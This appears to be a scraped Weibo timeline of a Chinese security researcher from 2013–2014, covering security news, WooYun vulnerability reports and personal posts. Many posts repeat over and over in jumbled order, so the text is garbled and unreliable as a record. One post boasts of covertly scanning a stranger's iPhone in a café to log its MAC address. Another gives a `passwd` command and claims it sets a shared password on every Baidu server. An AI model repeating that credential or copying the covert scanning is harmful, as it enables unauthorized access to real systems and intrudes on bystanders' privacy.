央视新闻《朝闻天下》报道:【泄露12306数据的两名犯罪嫌疑人已被抓获】两名犯罪嫌疑人已被抓获。犯罪嫌疑人利用已掌握的大量数据库“撞库”攻击12306网站,并非法转卖12306数据。猎豹移动安全专家建议修改12306登录密码及关联邮箱密码,并建议网民重要密码勿重复使用。 查看图片
两名犯罪嫌疑人已被抓获。犯罪嫌疑人利用已掌握的大量数据库“撞库”攻击12306网站,并非法转卖12306数据。猎豹移动安全专家建议修改12306登录密码及关联邮箱密码,并建议网民重要密码勿重复使用。 查看图片 ringzero
2014-12-26 来自 微博 weibo.com
ringzero
2014-12-22 来自 微博 weibo.com
到星巴克写东西,旁边坐着两富婆(某基金董事助理)和太古汇商场租赁负责人谈1500万的儿童游乐园项目,我对他们怎么处理回扣这方面听得非常细致。助理说服基金董事砸钱,太古汇拿出10%的独立股份反给富婆!无意瞟到富婆在用她的土豪IP6连无线,只好扫描62078端口记下手机MAC,接下来就是未完待续了
ringzero
2014-11-22
易经的乾卦,说君子自强不息,干事业,从下到上6个层次,依次是潜龙勿用,现龙在田,惕龙无咎,跃龙在渊,飞龙在天,亢龙有悔。现在充其量还在潜龙勿用,低调修行的阶段。
ringzero
2014-12-27 来自 微博 weibo.com
@金山毒霸:
央视新闻《朝闻天下》报道:【泄露12306数据的两名犯罪嫌疑人已被抓获】两名犯罪嫌疑人已被抓获。犯罪嫌疑人利用已掌握的大量数据库“撞库”攻击12306网站,并非法转卖12306数据。猎豹移动安全专家建议修改12306登录密码及关联邮箱密码,并建议网民重要密码勿重复使用。 查看图片
两名犯罪嫌疑人已被抓获。犯罪嫌疑人利用已掌握的大量数据库“撞库”攻击12306网站,并非法转卖12306数据。猎豹移动安全专家建议修改12306登录密码及关联邮箱密码,并建议网民重要密码勿重复使用。 查看图片 ringzero
2014-12-26 来自 微博 weibo.com
ringzero
2014-12-22 来自 微博 weibo.com
到星巴克写东西,旁边坐着两富婆(某基金董事助理)和太古汇商场租赁负责人谈1500万的儿童游乐园项目,我对他们怎么处理回扣这方面听得非常细致。助理说服基金董事砸钱,太古汇拿出10%的独立股份反给富婆!无意瞟到富婆在用她的土豪IP6连无线,只好扫描62078端口记下手机MAC,接下来就是未完待续了
ringzero
2014-11-22
易经的乾卦,说君子自强不息,干事业,从下到上6个层次,依次是潜龙勿用,现龙在田,惕龙无咎,跃龙在渊,飞龙在天,亢龙有悔。现在充其量还在潜龙勿用,低调修行的阶段。
ringzero
2014-12-22 来自 微博 weibo.com
到星巴克写东西,旁边坐着两富婆(某基金董事助理)和太古汇商场租赁负责人谈1500万的儿童游乐园项目,我对他们怎么处理回扣这方面听得非常细致。助理说服基金董事砸钱,太古汇拿出10%的独立股份反给富婆!无意瞟到富婆在用她的土豪IP6连无线,只好扫描62078端口记下手机MAC,接下来就是未完待续了
ringzero
2014-11-22
易经的乾卦,说君子自强不息,干事业,从下到上6个层次,依次是潜龙勿用,现龙在田,惕龙无咎,跃龙在渊,飞龙在天,亢龙有悔。现在充其量还在潜龙勿用,低调修行的阶段。
ringzero
2014-11-14
随着气流上升的风筝,是一种没有实力也想飞得很高的存在。
ringzero
2014-10-20 来自 微博 weibo.com
echo 'MhxzKhl' | passwd --stdin rd,百度的每台服务器,都有一个密码为梅花香自苦寒来的rd用户
ringzero
2014-12-22 来自 微博 weibo.com
到星巴克写东西,旁边坐着两富婆(某基金董事助理)和太古汇商场租赁负责人谈1500万的儿童游乐园项目,我对他们怎么处理回扣这方面听得非常细致。助理说服基金董事砸钱,太古汇拿出10%的独立股份反给富婆!无意瞟到富婆在用她的土豪IP6连无线,只好扫描62078端口记下手机MAC,接下来就是未完待续了
ringzero
2014-11-22
易经的乾卦,说君子自强不息,干事业,从下到上6个层次,依次是潜龙勿用,现龙在田,惕龙无咎,跃龙在渊,飞龙在天,亢龙有悔。现在充其量还在潜龙勿用,低调修行的阶段。
ringzero
2014-11-14
随着气流上升的风筝,是一种没有实力也想飞得很高的存在。
ringzero
2014-10-20 来自 微博 weibo.com
echo 'MhxzKhl' | passwd --stdin rd,百度的每台服务器,都有一个密码为梅花香自苦寒来的rd用户
ringzero
2014-12-27 来自 微博 weibo.com
@金山毒霸:
央视新闻《朝闻天下》报道:【泄露12306数据的两名犯罪嫌疑人已被抓获】两名犯罪嫌疑人已被抓获。犯罪嫌疑人利用已掌握的大量数据库“撞库”攻击12306网站,并非法转卖12306数据。猎豹移动安全专家建议修改12306登录密码及关联邮箱密码,并建议网民重要密码勿重复使用。 查看图片
两名犯罪嫌疑人已被抓获。犯罪嫌疑人利用已掌握的大量数据库“撞库”攻击12306网站,并非法转卖12306数据。猎豹移动安全专家建议修改12306登录密码及关联邮箱密码,并建议网民重要密码勿重复使用。 查看图片 ringzero
2014-12-26 来自 微博 weibo.com
ringzero
2014-12-22 来自 微博 weibo.com
到星巴克写东西,旁边坐着两富婆(某基金董事助理)和太古汇商场租赁负责人谈1500万的儿童游乐园项目,我对他们怎么处理回扣这方面听得非常细致。助理说服基金董事砸钱,太古汇拿出10%的独立股份反给富婆!无意瞟到富婆在用她的土豪IP6连无线,只好扫描62078端口记下手机MAC,接下来就是未完待续了
ringzero
2014-11-22
易经的乾卦,说君子自强不息,干事业,从下到上6个层次,依次是潜龙勿用,现龙在田,惕龙无咎,跃龙在渊,飞龙在天,亢龙有悔。现在充其量还在潜龙勿用,低调修行的阶段。
ringzero
2014-12-27 来自 微博 weibo.com
@金山毒霸:
央视新闻《朝闻天下》报道:【泄露12306数据的两名犯罪嫌疑人已被抓获】两名犯罪嫌疑人已被抓获。犯罪嫌疑人利用已掌握的大量数据库“撞库”攻击12306网站,并非法转卖12306数据。猎豹移动安全专家建议修改12306登录密码及关联邮箱密码,并建议网民重要密码勿重复使用。 查看图片
两名犯罪嫌疑人已被抓获。犯罪嫌疑人利用已掌握的大量数据库“撞库”攻击12306网站,并非法转卖12306数据。猎豹移动安全专家建议修改12306登录密码及关联邮箱密码,并建议网民重要密码勿重复使用。 查看图片 ringzero
2014-12-26 来自 微博 weibo.com
ringzero
2014-12-22 来自 微博 weibo.com
到星巴克写东西,旁边坐着两富婆(某基金董事助理)和太古汇商场租赁负责人谈1500万的儿童游乐园项目,我对他们怎么处理回扣这方面听得非常细致。助理说服基金董事砸钱,太古汇拿出10%的独立股份反给富婆!无意瞟到富婆在用她的土豪IP6连无线,只好扫描62078端口记下手机MAC,接下来就是未完待续了
ringzero
2014-11-22
易经的乾卦,说君子自强不息,干事业,从下到上6个层次,依次是潜龙勿用,现龙在田,惕龙无咎,跃龙在渊,飞龙在天,亢龙有悔。现在充其量还在潜龙勿用,低调修行的阶段。
ringzero
2014-12-27 来自 微博 weibo.com
@金山毒霸:
央视新闻《朝闻天下》报道:【泄露12306数据的两名犯罪嫌疑人已被抓获】两名犯罪嫌疑人已被抓获。犯罪嫌疑人利用已掌握的大量数据库“撞库”攻击12306网站,并非法转卖12306数据。猎豹移动安全专家建议修改12306登录密码及关联邮箱密码,并建议网民重要密码勿重复使用。 查看图片
两名犯罪嫌疑人已被抓获。犯罪嫌疑人利用已掌握的大量数据库“撞库”攻击12306网站,并非法转卖12306数据。猎豹移动安全专家建议修改12306登录密码及关联邮箱密码,并建议网民重要密码勿重复使用。 查看图片 ringzero
2014-12-26 来自 微博 weibo.com
ringzero
2014-12-22 来自 微博 weibo.com
到星巴克写东西,旁边坐着两富婆(某基金董事助理)和太古汇商场租赁负责人谈1500万的儿童游乐园项目,我对他们怎么处理回扣这方面听得非常细致。助理说服基金董事砸钱,太古汇拿出10%的独立股份反给富婆!无意瞟到富婆在用她的土豪IP6连无线,只好扫描62078端口记下手机MAC,接下来就是未完待续了
ringzero
2014-11-22
易经的乾卦,说君子自强不息,干事业,从下到上6个层次,依次是潜龙勿用,现龙在田,惕龙无咎,跃龙在渊,飞龙在天,亢龙有悔。现在充其量还在潜龙勿用,低调修行的阶段。
ringzero
2014-12-27 来自 微博 weibo.com
@金山毒霸:
央视新闻《朝闻天下》报道:【泄露12306数据的两名犯罪嫌疑人已被抓获】两名犯罪嫌疑人已被抓获。犯罪嫌疑人利用已掌握的大量数据库“撞库”攻击12306网站,并非法转卖12306数据。猎豹移动安全专家建议修改12306登录密码及关联邮箱密码,并建议网民重要密码勿重复使用。 查看图片
两名犯罪嫌疑人已被抓获。犯罪嫌疑人利用已掌握的大量数据库“撞库”攻击12306网站,并非法转卖12306数据。猎豹移动安全专家建议修改12306登录密码及关联邮箱密码,并建议网民重要密码勿重复使用。 查看图片 ringzero
2014-12-26 来自 微博 weibo.com
ringzero
2014-12-22 来自 微博 weibo.com
到星巴克写东西,旁边坐着两富婆(某基金董事助理)和太古汇商场租赁负责人谈1500万的儿童游乐园项目,我对他们怎么处理回扣这方面听得非常细致。助理说服基金董事砸钱,太古汇拿出10%的独立股份反给富婆!无意瞟到富婆在用她的土豪IP6连无线,只好扫描62078端口记下手机MAC,接下来就是未完待续了
ringzero
2014-11-22
易经的乾卦,说君子自强不息,干事业,从下到上6个层次,依次是潜龙勿用,现龙在田,惕龙无咎,跃龙在渊,飞龙在天,亢龙有悔。现在充其量还在潜龙勿用,低调修行的阶段。
ringzero
2014-12-27 来自 微博 weibo.com
@金山毒霸:
央视新闻《朝闻天下》报道:【泄露12306数据的两名犯罪嫌疑人已被抓获】两名犯罪嫌疑人已被抓获。犯罪嫌疑人利用已掌握的大量数据库“撞库”攻击12306网站,并非法转卖12306数据。猎豹移动安全专家建议修改12306登录密码及关联邮箱密码,并建议网民重要密码勿重复使用。 查看图片
两名犯罪嫌疑人已被抓获。犯罪嫌疑人利用已掌握的大量数据库“撞库”攻击12306网站,并非法转卖12306数据。猎豹移动安全专家建议修改12306登录密码及关联邮箱密码,并建议网民重要密码勿重复使用。 查看图片 ringzero
2014-12-26 来自 微博 weibo.com
ringzero
2014-12-22 来自 微博 weibo.com
到星巴克写东西,旁边坐着两富婆(某基金董事助理)和太古汇商场租赁负责人谈1500万的儿童游乐园项目,我对他们怎么处理回扣这方面听得非常细致。助理说服基金董事砸钱,太古汇拿出10%的独立股份反给富婆!无意瞟到富婆在用她的土豪IP6连无线,只好扫描62078端口记下手机MAC,接下来就是未完待续了
ringzero
2014-11-22
易经的乾卦,说君子自强不息,干事业,从下到上6个层次,依次是潜龙勿用,现龙在田,惕龙无咎,跃龙在渊,飞龙在天,亢龙有悔。现在充其量还在潜龙勿用,低调修行的阶段。
ringzero
2014-12-27 来自 微博 weibo.com
@金山毒霸:
央视新闻《朝闻天下》报道:【泄露12306数据的两名犯罪嫌疑人已被抓获】两名犯罪嫌疑人已被抓获。犯罪嫌疑人利用已掌握的大量数据库“撞库”攻击12306网站,并非法转卖12306数据。猎豹移动安全专家建议修改12306登录密码及关联邮箱密码,并建议网民重要密码勿重复使用。 查看图片
两名犯罪嫌疑人已被抓获。犯罪嫌疑人利用已掌握的大量数据库“撞库”攻击12306网站,并非法转卖12306数据。猎豹移动安全专家建议修改12306登录密码及关联邮箱密码,并建议网民重要密码勿重复使用。 查看图片 ringzero
2014-12-26 来自 微博 weibo.com
ringzero
2014-12-22 来自 微博 weibo.com
到星巴克写东西,旁边坐着两富婆(某基金董事助理)和太古汇商场租赁负责人谈1500万的儿童游乐园项目,我对他们怎么处理回扣这方面听得非常细致。助理说服基金董事砸钱,太古汇拿出10%的独立股份反给富婆!无意瞟到富婆在用她的土豪IP6连无线,只好扫描62078端口记下手机MAC,接下来就是未完待续了
ringzero
2014-11-22
易经的乾卦,说君子自强不息,干事业,从下到上6个层次,依次是潜龙勿用,现龙在田,惕龙无咎,跃龙在渊,飞龙在天,亢龙有悔。现在充其量还在潜龙勿用,低调修行的阶段。
ringzero
2014-12-27 来自 微博 weibo.com
@金山毒霸:
央视新闻《朝闻天下》报道:【泄露12306数据的两名犯罪嫌疑人已被抓获】两名犯罪嫌疑人已被抓获。犯罪嫌疑人利用已掌握的大量数据库“撞库”攻击12306网站,并非法转卖12306数据。猎豹移动安全专家建议修改12306登录密码及关联邮箱密码,并建议网民重要密码勿重复使用。 查看图片
两名犯罪嫌疑人已被抓获。犯罪嫌疑人利用已掌握的大量数据库“撞库”攻击12306网站,并非法转卖12306数据。猎豹移动安全专家建议修改12306登录密码及关联邮箱密码,并建议网民重要密码勿重复使用。 查看图片 ringzero
2014-12-26 来自 微博 weibo.com
ringzero
2014-12-22 来自 微博 weibo.com
到星巴克写东西,旁边坐着两富婆(某基金董事助理)和太古汇商场租赁负责人谈1500万的儿童游乐园项目,我对他们怎么处理回扣这方面听得非常细致。助理说服基金董事砸钱,太古汇拿出10%的独立股份反给富婆!无意瞟到富婆在用她的土豪IP6连无线,只好扫描62078端口记下手机MAC,接下来就是未完待续了
ringzero
2014-11-22
易经的乾卦,说君子自强不息,干事业,从下到上6个层次,依次是潜龙勿用,现龙在田,惕龙无咎,跃龙在渊,飞龙在天,亢龙有悔。现在充其量还在潜龙勿用,低调修行的阶段。
ringzero
2014-12-22 来自 微博 weibo.com
到星巴克写东西,旁边坐着两富婆(某基金董事助理)和太古汇商场租赁负责人谈1500万的儿童游乐园项目,我对他们怎么处理回扣这方面听得非常细致。助理说服基金董事砸钱,太古汇拿出10%的独立股份反给富婆!无意瞟到富婆在用她的土豪IP6连无线,只好扫描62078端口记下手机MAC,接下来就是未完待续了
ringzero
2014-11-22
易经的乾卦,说君子自强不息,干事业,从下到上6个层次,依次是潜龙勿用,现龙在田,惕龙无咎,跃龙在渊,飞龙在天,亢龙有悔。现在充其量还在潜龙勿用,低调修行的阶段。
ringzero
2014-11-14
随着气流上升的风筝,是一种没有实力也想飞得很高的存在。
ringzero
2014-10-20 来自 微博 weibo.com
echo 'MhxzKhl' | passwd --stdin rd,百度的每台服务器,都有一个密码为梅花香自苦寒来的rd用户
ringzero
2014-12-22 来自 微博 weibo.com
到星巴克写东西,旁边坐着两富婆(某基金董事助理)和太古汇商场租赁负责人谈1500万的儿童游乐园项目,我对他们怎么处理回扣这方面听得非常细致。助理说服基金董事砸钱,太古汇拿出10%的独立股份反给富婆!无意瞟到富婆在用她的土豪IP6连无线,只好扫描62078端口记下手机MAC,接下来就是未完待续了
ringzero
2014-11-22
易经的乾卦,说君子自强不息,干事业,从下到上6个层次,依次是潜龙勿用,现龙在田,惕龙无咎,跃龙在渊,飞龙在天,亢龙有悔。现在充其量还在潜龙勿用,低调修行的阶段。
ringzero
2014-11-14
随着气流上升的风筝,是一种没有实力也想飞得很高的存在。
ringzero
2014-10-20 来自 微博 weibo.com
echo 'MhxzKhl' | passwd --stdin rd,百度的每台服务器,都有一个密码为梅花香自苦寒来的rd用户
ringzero
2014-12-27 来自 微博 weibo.com
@金山毒霸:
央视新闻《朝闻天下》报道:【泄露12306数据的两名犯罪嫌疑人已被抓获】两名犯罪嫌疑人已被抓获。犯罪嫌疑人利用已掌握的大量数据库“撞库”攻击12306网站,并非法转卖12306数据。猎豹移动安全专家建议修改12306登录密码及关联邮箱密码,并建议网民重要密码勿重复使用。 查看图片
两名犯罪嫌疑人已被抓获。犯罪嫌疑人利用已掌握的大量数据库“撞库”攻击12306网站,并非法转卖12306数据。猎豹移动安全专家建议修改12306登录密码及关联邮箱密码,并建议网民重要密码勿重复使用。 查看图片 ringzero
2014-12-26 来自 微博 weibo.com
ringzero
2014-12-22 来自 微博 weibo.com
到星巴克写东西,旁边坐着两富婆(某基金董事助理)和太古汇商场租赁负责人谈1500万的儿童游乐园项目,我对他们怎么处理回扣这方面听得非常细致。助理说服基金董事砸钱,太古汇拿出10%的独立股份反给富婆!无意瞟到富婆在用她的土豪IP6连无线,只好扫描62078端口记下手机MAC,接下来就是未完待续了
ringzero
2014-11-22
易经的乾卦,说君子自强不息,干事业,从下到上6个层次,依次是潜龙勿用,现龙在田,惕龙无咎,跃龙在渊,飞龙在天,亢龙有悔。现在充其量还在潜龙勿用,低调修行的阶段。
ringzero
2014-12-27 来自 微博 weibo.com
@金山毒霸:
央视新闻《朝闻天下》报道:【泄露12306数据的两名犯罪嫌疑人已被抓获】两名犯罪嫌疑人已被抓获。犯罪嫌疑人利用已掌握的大量数据库“撞库”攻击12306网站,并非法转卖12306数据。猎豹移动安全专家建议修改12306登录密码及关联邮箱密码,并建议网民重要密码勿重复使用。 查看图片
两名犯罪嫌疑人已被抓获。犯罪嫌疑人利用已掌握的大量数据库“撞库”攻击12306网站,并非法转卖12306数据。猎豹移动安全专家建议修改12306登录密码及关联邮箱密码,并建议网民重要密码勿重复使用。 查看图片 ringzero
2014-12-26 来自 微博 weibo.com
ringzero
2014-12-22 来自 微博 weibo.com
到星巴克写东西,旁边坐着两富婆(某基金董事助理)和太古汇商场租赁负责人谈1500万的儿童游乐园项目,我对他们怎么处理回扣这方面听得非常细致。助理说服基金董事砸钱,太古汇拿出10%的独立股份反给富婆!无意瞟到富婆在用她的土豪IP6连无线,只好扫描62078端口记下手机MAC,接下来就是未完待续了
ringzero
2014-11-22
易经的乾卦,说君子自强不息,干事业,从下到上6个层次,依次是潜龙勿用,现龙在田,惕龙无咎,跃龙在渊,飞龙在天,亢龙有悔。现在充其量还在潜龙勿用,低调修行的阶段。
ringzero
2014-12-22 来自 微博 weibo.com
到星巴克写东西,旁边坐着两富婆(某基金董事助理)和太古汇商场租赁负责人谈1500万的儿童游乐园项目,我对他们怎么处理回扣这方面听得非常细致。助理说服基金董事砸钱,太古汇拿出10%的独立股份反给富婆!无意瞟到富婆在用她的土豪IP6连无线,只好扫描62078端口记下手机MAC,接下来就是未完待续了
ringzero
2014-11-22
易经的乾卦,说君子自强不息,干事业,从下到上6个层次,依次是潜龙勿用,现龙在田,惕龙无咎,跃龙在渊,飞龙在天,亢龙有悔。现在充其量还在潜龙勿用,低调修行的阶段。
ringzero
2014-11-14
随着气流上升的风筝,是一种没有实力也想飞得很高的存在。
ringzero
2014-10-20 来自 微博 weibo.com
echo 'MhxzKhl' | passwd --stdin rd,百度的每台服务器,都有一个密码为梅花香自苦寒来的rd用户
ringzero
2014-12-22 来自 微博 weibo.com
到星巴克写东西,旁边坐着两富婆(某基金董事助理)和太古汇商场租赁负责人谈1500万的儿童游乐园项目,我对他们怎么处理回扣这方面听得非常细致。助理说服基金董事砸钱,太古汇拿出10%的独立股份反给富婆!无意瞟到富婆在用她的土豪IP6连无线,只好扫描62078端口记下手机MAC,接下来就是未完待续了
ringzero
2014-11-22
易经的乾卦,说君子自强不息,干事业,从下到上6个层次,依次是潜龙勿用,现龙在田,惕龙无咎,跃龙在渊,飞龙在天,亢龙有悔。现在充其量还在潜龙勿用,低调修行的阶段。
ringzero
2014-11-14
随着气流上升的风筝,是一种没有实力也想飞得很高的存在。
ringzero
2014-10-20 来自 微博 weibo.com
echo 'MhxzKhl' | passwd --stdin rd,百度的每台服务器,都有一个密码为梅花香自苦寒来的rd用户
ringzero
2014-11-14
随着气流上升的风筝,是一种没有实力也想飞得很高的存在。
ringzero
2014-10-20 来自 微博 weibo.com
echo 'MhxzKhl' | passwd --stdin rd,百度的每台服务器,都有一个密码为梅花香自苦寒来的rd用户
ringzero
2014-10-18 来自 微博 weibo.com
很多人爱打听别人的隐私,比如挣多少钱、哪个学校毕业、住在哪里、有没有结婚、有没有小孩、生没生二胎,感觉上跟缺乏安全感和自信有关,希望从别人的状态里了解自身在社会上的位置
ringzero
2014-10-10 来自 微博 weibo.com
从企业管理人员、安全公司从业人员、白帽子、互联网小白等多个角度来看待“白帽子”,总体写得比较客观!虽然对我有点抹黑的嫌疑……![[衰]](./wy_files/d_shuai-ade42a9895.png)
@hi_301:
#南方周末·经济#【黑客暗战黑帽、白帽、灰帽背后的隐秘世界】 南方周末 - 黑客暗战 黑帽、白帽、灰帽背后的隐秘世界(分享自 @南方周末 )
南方周末 - 黑客暗战 黑帽、白帽、灰帽背后的隐秘世界(分享自 @南方周末 ) 长图 
ringzero
2014-10-09
@侯彦迪:
今年,大连部分11路公交车LED显示屏被黑客攻破,屏幕显示为“请注意,系统有漏洞。wooyun——路人甲到此一游。”wooyun(乌云)是国内著名的第三方安全漏洞平台。据了解,大连公交无线信息发布系统的漏洞早在8月21日就已被白帽黑客的发现并报告,至今仍未能有效处理。 WooYun乌云白帽子攻破大连公交无线信息发布系统
WooYun乌云白帽子攻破大连公交无线信息发布系统 
ringzero
2014-09-25 来自 微博 weibo.com
补丁白打了。。。
ringzero
2014-09-22 来自 微博 weibo.com
![[嘻嘻]](./wy_files/d_xixi-ce63ce2629.png)
是啊,云计算大数据的来临,现在所有的数据存在你的设备上已经不重要了,所有的数据和信息,都会被偷偷的存在云端,存在各个厂商的服务器上。 //@爱啃面包的Ti0c1: 现在的APP 不抓点你通讯录 不抓你已安装的APP 不抓点地理位置什么的 那还是APP么?
@ringzero:
以后越来越多的安全,不是说在你的设备上杀个病毒,安装一个防御软件这么简单。现在前所未有的用户数据通通都被传送到云端,导致用户变得无比透明,所以未来安全问题将不在于黑客攻击你的电脑或移动设备拿到你的信息,很有可能只需要把某个互联网公司的服务器攻破,就可以得到上亿人的隐私信息数据。
ringzero
2014-09-22 来自 微博 weibo.com
以后越来越多的安全,不是说在你的设备上杀个病毒,安装一个防御软件这么简单。现在前所未有的用户数据通通都被传送到云端,导致用户变得无比透明,所以未来安全问题将不在于黑客攻击你的电脑或移动设备拿到你的信息,很有可能只需要把某个互联网公司的服务器攻破,就可以得到上亿人的隐私信息数据。
ringzero
2014-09-22 来自 微博 weibo.com
用户使用的互联网服务越多,代表着泄露的信息也会越多,信息安全是云计算和大数据发展到今天必然要付出的代价。
ringzero
2014-09-17 来自 微博 weibo.com
1:麻辣虾,2:油焖虾,3:油焖虾加了葱,4:酱油红烧大虾配米粉,5:蒸过的虾去壳放在加热过的粗盐上?,6:香辣虾,7:白灼虾,8:香辣虾(湘菜做法),9:麻辣虾(辣椒花椒重口味,看上去有用辣椒酱)。。。
@玩转instagram:
上辈子我一定是只鲸鱼!这辈子才会这么爱吃虾!喜欢吃虾的转起来![花心]
ringzero
2014-09-15 来自 iPhone 5s
@凤凰网科技:
【乌云曝新浪支付系统存高危漏洞 新浪已确认】今天凌晨,乌云平台漏洞作者猪猪侠报告了新浪支付系统出现了SQL注入漏洞。目前新浪已经确认该漏洞,并表示漏洞危害等级高,正在修复中。乌云曝新浪支付系统存高危漏洞 新浪已确认
乌云曝新浪支付系统存高危漏洞 新浪已确认 ringzero
2014-09-17 来自 微博 weibo.com
1:麻辣虾,2:油焖虾,3:油焖虾加了葱,4:酱油红烧大虾配米粉,5:蒸过的虾去壳放在加热过的粗盐上?,6:香辣虾,7:白灼虾,8:香辣虾(湘菜做法),9:麻辣虾(辣椒花椒重口味,看上去有用辣椒酱)。。。
@玩转instagram:
上辈子我一定是只鲸鱼!这辈子才会这么爱吃虾!喜欢吃虾的转起来![花心]
ringzero
2014-09-15 来自 iPhone 5s
@凤凰网科技:
【乌云曝新浪支付系统存高危漏洞 新浪已确认】今天凌晨,乌云平台漏洞作者猪猪侠报告了新浪支付系统出现了SQL注入漏洞。目前新浪已经确认该漏洞,并表示漏洞危害等级高,正在修复中。乌云曝新浪支付系统存高危漏洞 新浪已确认
乌云曝新浪支付系统存高危漏洞 新浪已确认 ![[给力]](./wy_files/f_geili-244fca3c70.png)
ringzero
2014-09-14 来自 iPhone 5s
二哥讲的由浅入深,条例清晰,看完演示视频后,顿时觉得xss之神非你莫属 ![[沙尘暴]](./wy_files/w_shachenbao-50cd8df115.png)
@工具猫-gainover:
#乌云首届安全峰会# 俺自己在乌云峰会上的PPT下载 网页链接 ,PPT中所讲漏洞的原作者为neobyte,在此,我仅仅强调该漏洞的危害程度及影响范围,没有什么技术上的点![[可怜]](./wy_files/d_kelian-20b4c8e771.png)
。此外,PPT中演示所使用的4个视频,在厂商修复漏洞后,另行补上。@乌云-漏洞报告平台 @乌云知识库
网页链接 ,PPT中所讲漏洞的原作者为neobyte,在此,我仅仅强调该漏洞的危害程度及影响范围,没有什么技术上的点。此外,PPT中演示所使用的4个视频,在厂商修复漏洞后,另行补上。@乌云-漏洞报告平台 @乌云知识库 
ringzero
2014-08-22 来自 微博 weibo.com
![[挤眼]](./wy_files/d_jiyan-ae754a591c.png)
@淡淡玉:
【视频:[惊奇系列]无须遥控钥匙解锁奥迪车】 [惊奇系列]无须遥控钥匙解锁奥迪车
[惊奇系列]无须遥控钥匙解锁奥迪车 ringzero
2014-08-18 来自 iPhone 5s
做安全的可以向体检机构学学营销,在你选择检查项目的时候,客服会依据你的年龄、性别、职业,从体检机构的病例数据库中统计出最大机率的症状,再由浅入深,循序渐进的用生命安全这个命题来吓唬你,直至你交钱妥协…[左哼哼]
ringzero
2014-08-14 来自 微博 weibo.com
@乌云-漏洞报告平台 突然发现 WuYun.Org 能打开了,双拼更好记。网页链接
网页链接 
![[可爱]](./wy_files/d_keai-9f81f72301.png)
![[疑问]](./wy_files/d_yiwen-5ee3076b68.png)
ringzero
2014-07-30 来自 微博 weibo.com
麻辣宝贝龙虾、香辣宝贝龙虾、清蒸宝贝龙虾、啤酒宝贝龙虾、鲜煮宝贝龙虾!!!
抱歉,此微博已被作者删除。查看帮助:http://t.cn/Rfd3rQV
ringzero
2014-07-27 来自 微博 weibo.com
美国最大的无线通信提供商Verizon近期发布了“2013年数据泄露事故调查报告(DBIR)”,报告显示:几乎70%的数据泄露事故都是由第三方检测出的,而这恰恰反映了许多企业长期疏忽数据泄露检测的真实现象。@乌云-漏洞报告平台 第三方中立安全平台的重要性越来越明显!!!
ringzero
2014-07-19 来自 微博 weibo.com
转发微博
@玩转instagram:
小拉布拉多 ![[爱你]](./wy_files/d_aini-2b6c9354c7.png)
ringzero
2014-07-11 来自 iPhone 5s
![[太开心]](./wy_files/d_taikaixin-2ea4a8779a.png)
@SyScan360:
【SyScan360迎来最小参会者】今天组委会在和参会者沟通时,发现对方竟然是个只有初中一年级的00后!这位来自长沙的小男生是Steve Jobs的崇拜者,平时会帮老师同学解决电脑问题,被同学们誉为“电脑神童”。他为了来SyScan360,甚至放弃了夏令营的机会,他对盘古团队的演讲尤为感兴趣。![[鼓掌]](./wy_files/d_guzhang-4ac2b70b8f.png)
ringzero
2014-07-08 来自 iPhone 5s
直接DDOS把新浪SAE打到封号,还真没法防~
@乌云-漏洞报告平台:
乌云漏洞报告平台中午受到不明DDOS攻击,目前相关情况正在处理中,谢谢大家关心 [呵呵]
ringzero
2014-06-11 来自 微博 weibo.com
转发微博
@工具猫-gainover:
乌云君 - 闲谈:乌云上那些web-based的QQ漏洞(分享自 @知乎 专栏) 网页链接
网页链接 长图 
ringzero
2014-06-09 来自 微博 weibo.com
为了保护土豪 请大家不要私自解密啊.....
@工具猫-gainover:
上榜的赶紧都自觉请客。 ![[泪流满面]](./wy_files/lxh_leiliumanmian-e20a81b9b2.png)
@乌云-漏洞报告平台 @zeracker
@乌云-漏洞报告平台 @zeracker 
ringzero
2014-05-12 来自 知乎网
我在 @知乎 回答了【乌云众测是怎样的一个众包平台?】:鉴于目前的网络环境,每一家大型公司都雇用了全职网络安全专家来帮助它们先于黑客发现和修补系统存在的漏洞。 乌云众测认为自己进行的安全众包模式能够比当前各大公司采用的安全手段更加有效。 根据每一家公司的预算… 王音: 乌云众测是怎样的一个众包平台? - 知乎
王音: 乌云众测是怎样的一个众包平台? - 知乎 ringzero
2014-05-08 来自 微博 weibo.com
FireEye CEO apologizes after stock plunge: Kelly pressed DeWalt on selling 485,656 shares in March at an average price of $79.54 网页链接 CEO卖得真及时,套现3800万刀~~
网页链接 CEO卖得真及时,套现3800万刀~~
@猪儿虫小次郎:
诚邀各位一起来掀桌子。[崩溃] 我在:美国Santa Clara
美国Santa Clara 
ringzero
2014-04-08 来自 媒体版微博
选择了作君子,就不需要再羡慕只有小人才能得到的好处。。。
@新浪科技:
乌云创始人方小顿是国内著名安全组织80sec成员,也是白帽黑客中的佼佼者。在他看来,白帽子最难的就是坚持自己的理想,不计眼前的利益诱惑,从整个行业着眼为网络安全贡献自己的力量。在他眼里,白帽子是一群挣扎在理想和现实边缘的黑客。【乌云创始人方小顿:白帽黑客的挣扎】方小顿留着一头长发,颇具有文艺青年范儿。他认为,白帽子最难的就是坚持自己的理想,不计眼前利益诱惑,从整个行业着眼为网络安全贡献自己的力量。在他眼里,白帽子是一群挣扎在理想和现实边缘的黑客。#人物·话说#
【乌云创始人方小顿:白帽黑客的挣扎】方小顿留着一头长发,颇具有文艺青年范儿。他认为,白帽子最难的就是坚持自己的理想,不计眼前利益诱惑,从整个行业着眼为网络安全贡献自己的力量。在他眼里,白帽子是一群挣扎在理想和现实边缘的黑客。#人物·话说# 
ringzero
2014-01-21 来自 微博 weibo.com
65.49.2.178 属于 SoSophidea Incphidea Inc 公司,This "Sophidea Inc" name has come up many times in many cyber criminal issues。而且这个公司和很多网络犯罪有联系!!!//@乌云-漏洞报告平台: 这是要粗大事的节奏么?
@DNSPod:
#DNSPod通知#国内所有通用顶级域的根出现异常,我们已联系相关机构协调处理,进一步信息,请随时关注官方微博。
ringzero
2013-09-21 来自 微博 weibo.com
@yuange1975 @tombkeeper 我在@微盘 分享了"Information_Security_Technologies_&_Markets"的FreeMIND+MindManage版本,这张超大的思维导图以业务为线索分类,收录了全世界几乎#所有#重要信息安全厂商,并列出了部分相关产品。 下载地址:网页链接
网页链接 
ringzero
2013-08-01 来自 iPad客户端
说多了都是泪呀〜
抱歉,此微博已被作者删除。查看帮助:http://t.cn/Rfd3rQV